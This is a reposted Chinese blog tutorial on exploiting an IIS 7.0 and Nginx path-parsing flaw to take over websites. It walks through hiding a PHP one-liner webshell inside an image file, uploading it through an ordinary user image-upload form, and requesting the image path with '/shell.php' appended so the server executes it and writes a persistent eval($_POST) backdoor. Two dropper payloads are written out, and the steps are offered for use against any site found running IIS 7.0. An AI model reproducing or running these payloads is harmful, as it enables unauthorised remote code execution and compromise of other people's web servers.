通杀IIS7.0畸形解析0day漏洞
生活随笔
收集整理的這篇文章主要介紹了
通杀IIS7.0畸形解析0day漏洞
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
先合并一張PHP一句話圖片馬,合并方法:
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
②、用edjpgcom,進行圖片和一句話木馬的合并,
圖片隨便找一張.
【順帶著說一下edjpgcom的使用方法:打開edjpgcom.exe所在文件夾,然后把你所要修改的圖片拖動到
edjpgcom.exe上面,然后edjpgcom.exe會自動打開,寫入想要些的代碼即可】
一句話:
| <?PHP fputs(fopen(’shell.php’,’w’),’<?php eval($_POST[cmd])?>’);?> |
找到圖片地址,然后在地址后面加個shell.php,在瀏覽器中運行。
比如假設圖片地址為http://blog.exehack.com/tupian/1.jpg
則執行地址為http://blog.exehack.com/tupian/1.jpg/shell.php
然后,會在目錄下生成shell.php。比如:http://blog.exehack.com/tupian/shell.php
shell.php就是我們的一句話地址。再拿一句話的客戶端連接這個一句話地址就好。
上面就是Nginx拿站全過程,IIS7.0的畸形解析和這個類似。?
?
找到某個使用IIS7.0架設的站,然后找到其中的圖片上傳點(不需要管理權限,普通注冊用戶即可搞定),把PHP大馬后綴改成.jpg,傳上去,得到圖片地址。
?
在圖片格式后面添加xx.php xx隨便你怎么填。只要后綴為.php就好。
?
| <?fputs(fopen(“3Kin.PHP”,”w”),”<?eval(\$_POST[3Kin]);?>”)?> |
轉載于:https://www.cnblogs.com/canlay/archive/2012/01/17/2325123.html
總結
以上是生活随笔為你收集整理的通杀IIS7.0畸形解析0day漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 解决FileUpload控件上传大文件被
- 下一篇: php页面缓存